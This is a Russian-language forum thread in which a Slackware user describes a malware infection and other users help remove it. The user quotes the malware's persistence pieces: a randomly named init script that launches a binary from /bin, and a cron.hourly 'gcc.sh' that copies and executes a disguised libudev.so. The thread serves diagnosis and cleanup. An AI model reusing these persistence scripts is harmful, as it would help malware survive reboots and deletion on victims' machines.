Звелась зараза

[kot]

ps aux выдает такую картину. причем пид процессов меняется при каждом вызове. Команды одни и теже.

Код Выделить Развернуть


root      4790  0.0  0.0   1456   908 ?        Ss   16:04   0:00 pwd                         
root      4792  0.0  0.0   1456   908 ?        Ss   16:04   0:00 top                         
root      4793  0.0  0.0   1456   908 ?        Ss   16:04   0:00 uptime                         
root      4794  0.0  0.0   1456   908 ?        Ss   16:04   0:00 echo "find"                         
root      4795  0.0  0.0   1456   908 ?        Ss   16:04   0:00 cat resolv.conf                         

root      7563  0.0  0.0   1456   912 ?        Ss   16:19   0:00 whoami                         
root      7565  0.0  0.0   1456   908 ?        Ss   16:19   0:00 sleep 1                         
root      7566  0.0  0.0   1456   908 ?        Ss   16:19   0:00 echo "find"                         
root      7567  0.0  0.0   1456   908 ?        Ss   16:19   0:00 ifconfig eth0                         
root      7568  0.0  0.0   1456   908 ?        Ss   16:19   0:00 top                         
root      7579  0.0  0.0   1456   908 ?        Ss   16:19   0:00 who                         
root      7580  0.0  0.0   1456   908 ?        Ss   16:19   0:00 su                         
root      7581  0.0  0.0   1456   908 ?        Ss   16:19   0:00 who                         
root      7582  0.0  0.0   1456   908 ?        Ss   16:19   0:00 ls -la                         
root      7583  0.0  0.0   1456   908 ?        Ss   16:19   0:00 cd /etc


заметил в /usr/X11R6/bin создается файл типа xjyqeplhtu, каждую секунду меняет название.
в /etc/rc.d/init.d есть файл rqpizljdcu, удаление его никчему не приводит, после перезагрузки опять появляется с другим названием.
его содержимое

Код Выделить Развернуть


#!/bin/sh
# chkconfig: 12345 90 90
# description: rqpizljdcu
### BEGIN INIT INFO
# Provides:             rqpizljdcu
# Required-Start:
# Required-Stop:
# Default-Start:        1 2 3 4 5
# Default-Stop:
# Short-Description:    rqpizljdcu
### END INIT INFO
case $1 in
start)
        /bin/rqpizljdcu
        ;;
stop)
        ;;
*)
        /bin/rqpizljdcu
        ;;
esac

в /bin сидит одноименный файл, удаление никчему не приводит после перезагрузки опять появляется.
в /etc/cron.hourly сидит gcc.sh внутри

Код Выделить Развернуть

#!/bin/sh
PATH=/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin:/usr/X11R6/bin
for i in `cat /proc/net/dev|grep :|awk -F: {'print $1'}`; do ifconfig $i up& done
cp /lib/libudev.so /lib/libudev.so.6
/lib/libudev.so.6

в /lib есть libudev.so, но libudev.so.6 нет при удалении тут же появляется вновь.
стоит слака 64 битная 14.1
как изловить и убить гада????

[Graf]

А загрузиться с установочного носителя и попробовать удалить не удаляемое?
Если не поможет, то посмотреть на 123.txt в части подозрительных процессов.

Код Выделить Развернуть


# ps -exf > 123.txt


[kot]

А загрузиться с установочного носителя

запаниковал и не подумал. загрузился с диска и всех удалил, спасибо

[timoshka]

Хорошо бы пароль root сменить, на всякий случай